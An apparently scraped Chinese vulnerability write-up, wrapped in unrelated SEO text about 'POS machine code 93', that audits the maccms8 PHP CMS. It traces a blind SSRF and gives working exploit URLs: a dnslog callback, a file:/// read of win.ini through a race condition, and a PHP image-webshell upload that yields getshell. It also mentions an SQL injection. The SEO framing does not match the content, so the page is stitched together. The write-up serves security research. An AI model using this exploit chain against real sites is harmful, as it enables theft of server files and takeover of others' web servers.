網上有很多關于pos機代碼93,無回顯SSRF的奇妙審計之旅的知識，也有很多人為大家解答關于pos機代碼93的問題，今天pos機之家(m.dsth100338.com)為大家整理了關于這方面的知識，讓我們一起來看下吧!

本文目錄一覽：

1、pos機代碼93

pos機代碼93

審計了一個php的無回顯ssrf和getshell

好久沒代碼審計了，隨便找了個php的源碼審了好幾天

雖然漏洞不是很難利用，但是這個過程真是超級有趣

日常搜索curl_exec()函數

發(fā)現(xiàn)在maccms8\\inc\\common\\function.php文件的824行發(fā)現(xiàn)利用了該函數

觀察發(fā)現(xiàn)ch參數由ch參數由url傳入，在getPage()函數中沒有任何操作對$url進行過濾

接著就反向查找哪里調用了getPage()函數

發(fā)現(xiàn)調用該函數還挺多，挨個查找發(fā)現(xiàn)inc\\common\\function.php的1746行或許可以利用

此時傳入的$url函數進行了幾處截斷拼接操作，也沒啥過濾啥的

那就繼續(xù)查找savepic()函數被誰調用了

乍一看也挺多的，我們只好挨個查看了

在maccms8\\admin1212\\admin_interface.php的第452行我們發(fā)現(xiàn)調用了該函數

傳入的參數是$d_pic,慢慢往上追溯發(fā)現(xiàn)該參數在第66行可以通過be()函數傳入

be()函數干嘛用的就不展開將了，這是該源碼自己定義的函數，all表示可以通過get或post方式接收某一參數，d_pic就是參數值

到這，算是吧這一套傳參過程是給追完了，只要我們get傳入d_pic就行唄？

我們從開頭順著看運行過程，主要是判斷需要哪些條件，可以讓我們運行到漏洞處

走著走著發(fā)現(xiàn)在48,50行有個判斷

ac=vod和ac=vod和pass是某個值，往上看，發(fā)現(xiàn)這倆值都可以get或post方式傳入

ac好說傳入vod，pass是啥啊

全局搜索pass，發(fā)現(xiàn)是config/config.php的一個變量

此變量是可以在后臺的站外入庫配置處查看的

然后發(fā)現(xiàn)84,85行進行了判斷，不能是空，一猜就是和上面相同的方法get或post傳入即可

然后在446，447行發(fā)現(xiàn)兩個判斷

strpos(','.$uprule,'j')

$MAC['collect']['vod']['pic']==1

[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-33320df4e3322a67cc6bdb0faf688e2b25a78373.png)這是啥啊，結合上面的pass也是類似判斷，我猜測也是網站的配置config.php[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-eaeebe490082dbbf4a231815a3f387bfe49bd261.png)需要將pic改為1，所以去后臺找相關操作發(fā)現(xiàn)采集過程中同步圖片控制該參數[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-fddcd30d76d9f8a5d082852edb3758aede882603.png)我們設為開啟即成為1，然后j是在二次更新規(guī)則處選擇圖片### 開始利用到這所以流程走完了，構造的url，嘗試訪問dnslog

http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=1&d_type=1&d_pic=http://ckrooo.dnslog.cn

[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-74dbf1c47f4777fd3f4994261c4b784213b4108a.png)發(fā)現(xiàn)新增數據成功？這是執(zhí)行了sql注入，這里是存在sql注入的（但我已經提交了），不是本文重點再次訪問一次，發(fā)現(xiàn)dnslog接收到訪問了[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-143d6072748a17f9ef5934fb46c4efba108953aa.png)（這里我們也可以停下來思考一下這個流程，為啥訪問兩次才接收到dnslog數據）到這雖然我們發(fā)現(xiàn)了ssrf漏洞，但是沒回顯啊ssrf的各種偽協(xié)議、讀源碼、掃內網沒法玩啊，食之無味棄之可惜[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-1a40a3d1d92c77cf0f1cba6993d695d6ed8e378b.png)### 峰回路轉過了兩天總覺得該漏洞太氣人了，沒回顯的ssrf多氣人，繼續(xù)挖！繼續(xù)回去看代碼，發(fā)現(xiàn)在inc\\\\common\\\\function.php的1749行有一個操作，寫入內容到文件?峰回路轉？[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-d870a4f1058521f7e8b303845cfbc7b537186641.png)往下繼續(xù)看，發(fā)現(xiàn)后面進行了判斷是不是圖片內容[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-15272229e5c46e4190a7497358610f0abb1d6bd9.png)不是圖片就刪除該文件，你說氣不氣人那就先測試一下寫入圖片吧

http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=1&d_type=1&d_pic=http:xxx.123.png

發(fā)現(xiàn)圖片被寫入到了/upload/vod/2021-08-18/123.png？？？目錄可猜測？文件名是原文件名?思考半天，突然想到一個姿勢，條件競爭！因為該源碼，我們是已經成功寫入到目錄下了，只是后面來了個判斷給刪了，但利用條件競爭我們是有機會在沒刪之前讀取該文件的。開始構造，使用burp跑

http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=1&d_type=1&d_pic=file:///c:/windows/win.ini

[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-139f84525ca4cbc078cb9423aa675a6a668dfb33.png)

http://127.0.0.1/maccms8/upload/vod/2021-08-18/win.ini

[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-3bcf157f9cb75df16d88cef3df6772aaea79434a.png)兩個數據開跑[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b4266b6264ee06d9352d0b15e93c59b72dcf5617.png)成了！文件上傳getshell============其實這里還是有另一個洞，就是文件上傳首先構造圖片馬，必須是圖片馬，因為文件進行了圖片判斷但是，這里可以是php后綴！很離譜

http://127.0.0.1/maccms8/admin1212/admin_interface.php?ac=vod&pass=LMB9UVWA63&d_name=10&d_type=2&d_pic=http://xxx/1234.php

[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b2f8fd0e2d6e93fde918ee67ab324751ded0c72f.png)會將馬上傳到

http://127.0.0.1/maccms8/upload/vod/2021-08-18/1234.php

成功解析[](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ce3f6ed3086bbb356ba29ef51ca36a9194532e4c.png)總結==真是峰回路轉啊，多思考是多么的重要其實這個ssrf還有幾處利用，比如ac=art，也是需要去后臺改相應配置

以上就是關于pos機代碼93,無回顯SSRF的奇妙審計之旅的知識，后面我們會繼續(xù)為大家整理關于pos機代碼93的知識，希望能夠幫助到大家！